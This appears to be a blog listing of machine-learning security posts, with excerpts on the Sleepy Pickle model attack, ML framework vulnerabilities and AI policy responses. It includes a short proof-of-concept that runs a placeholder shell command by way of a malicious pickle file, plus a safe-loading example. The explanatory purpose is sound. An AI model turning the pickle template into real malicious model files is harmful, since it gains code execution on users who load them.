Machine Learning

Exploiting ML models with pickle file attacks: Part 2

Boyan Milanov
In part 1, we introduced Sleepy Pickle, an attack that uses malicious pickle files to stealthily compromise ML models and carry out sophisticated attacks against end users. Here we show how this technique can be adapted to enable long-lasting presence on compromised systems while remaining undetected. This variant technique, which we call […]

Exploiting ML models with pickle file attacks: Part 1

Boyan Milanov
We’ve developed a new hybrid machine learning (ML) model exploitation technique called Sleepy Pickle that takes advantage of the pervasive and notoriously insecure Pickle file format used to package and distribute ML models. Sleepy Pickle goes beyond previous exploit techniques that target an organization’s systems when they deploy ML models to instead […]
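As a hedged illustration of why the format is so dangerous, the minimal sketch below shows standard pickle deserialization abuse, not the actual Sleepy Pickle payload; the class name and the echoed command are placeholders. An attacker-controlled object can run arbitrary code the moment a "model" file is loaded:

import os
import pickle

class MaliciousPayload:
    # Placeholder class: pickle records the callable returned by __reduce__
    # and invokes it at load time, so any command runs when a victim
    # deserializes the file.
    def __reduce__(self):
        return (os.system, ("echo payload executed during unpickling",))

# Package the payload the same way a legitimate model object would be packaged.
with open("model.pkl", "wb") as f:
    pickle.dump(MaliciousPayload(), f)

# Loading the file executes the command as a side effect of deserialization.
with open("model.pkl", "rb") as f:
    pickle.load(f)

A real Sleepy Pickle payload would not announce itself like this; per the post, it instead stealthily modifies the deserialized model, which is what makes the technique hard to detect.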

Announcing AI/ML safety and security trainings

Michael D. Brown
We are offering AI/ML safety and security training this year! Recent advances in AI/ML technologies have opened up a new world of possibilities for businesses to run more efficiently and offer better services and products. However, incorporating AI/ML into computing systems brings new and unique complexities, risks, and attack surfaces. In our experience […]

Our response to the US Army’s RFI on developing AIBOM tools

Adelin Travers, Michael Brown
The US Army’s Program Executive Office for Intelligence, Electronic Warfare and Sensors (PEO IEW&S) recently issued a request for information (RFI) on methods to implement and automate production of an artificial intelligence bill of materials (AIBOM) as part of Project Linchpin. The RFI describes the AIBOM as a detailed […]

Celebrating our 2023 open-source contributions

At Trail of Bits, we pride ourselves on making our best tools open source, such as Slither, PolyTracker, and RPC Investigator. But while this post is about open source, it’s not about our tools… In 2023, our employees submitted over 450 pull requests (PRs) that were merged into non-Trail of Bits repositories. This demonstrates our […]

Our thoughts on AIxCC’s competition format

Michael Brown
Late last month, DARPA officially opened registration for their AI Cyber Challenge (AIxCC). As part of the festivities, DARPA also released some highly anticipated information about the competition: a request for comments (RFC) that contained a sample challenge problem and the scoring methodology. Prior rules documents and FAQs released by DARPA painted […]

AI In Windows: Investigating Windows Copilot

Yarden Shafir
AI is becoming ubiquitous, as developers of widely used tools like GitHub and Photoshop are quickly implementing and iterating on AI-enabled features. With Microsoft’s recent integration of Copilot into Windows, AI is even on the old stalwart of computing—the desktop. The integration of an AI assistant into an entire operating system is […]

Assessing the security posture of a widely used vision model: YOLOv7

Alvin Crighton, Anusha Ghosh, Suha Hussain, Heidy Khlaaf, Jim Miller
TL;DR: We identified 11 security vulnerabilities in YOLOv7, a popular computer vision framework, that could enable attacks including remote code execution (RCE), denial of service, and model differentials (where an attacker can trigger a model to perform differently in different contexts). Open-source software […]
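The post itself details the findings; as a hedged, generic sketch of how RCE commonly arises in ML frameworks (unsafe deserialization of untrusted model files), the snippet below contrasts default and restricted checkpoint loading in PyTorch. The file name is a placeholder, and this is not code taken from YOLOv7.

import torch

# Create a benign checkpoint so the sketch is self-contained.
torch.save({"weight": torch.zeros(3, 3)}, "weights.pt")

# Risky pattern for untrusted files: torch.load() unpickles arbitrary
# objects by default, so a crafted checkpoint can execute code on load.
# state = torch.load("weights.pt")

# Safer pattern (PyTorch 1.13+): weights_only=True restricts deserialization
# to tensors and plain containers, rejecting arbitrary callables.
state = torch.load("weights.pt", weights_only=True)
print(state["weight"].shape)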

How AI will affect cybersecurity: What we told the CFTC

Dan Guido, CEO
The second meeting of the Commodity Futures Trading Commission’s Technology Advisory Committee (TAC) on July 18 focused on the effects of AI on the financial sector. During the meeting, I explained that AI has the potential to fundamentally change the balance between cyber offense and defense, and that we need security-focused benchmarks […]

Trail of Bits’s Response to OSTP National Priorities for AI RFI

Heidy Khlaaf, Michael Brown
The Office of Science and Technology Policy (OSTP) has circulated a request for information (RFI) on how best to develop policies that support the responsible development of AI while minimizing risk to rights, safety, and national security. In our response, we highlight the following points: To ensure that AI […]

Trail of Bits’s Response to NTIA AI Accountability RFC

Artem Dinaburg, Heidy Khlaaf
The National Telecommunications and Information Administration (NTIA) has circulated an Artificial Intelligence (AI) Accountability Policy Request for Comment on what policies can support the development of AI audits, assessments, certifications, and other mechanisms to create earned trust in AI systems. Trail of Bits has submitted a response to the […]

We need a new way to measure AI security

TL;DR: Trail of Bits has launched a practice focused on machine learning and artificial intelligence, bringing together safety and security methodologies to create a new risk assessment and assurance program. This program evaluates potential bespoke risks and determines the necessary safety and security measures for AI-based systems. If you’ve read any news over the past […]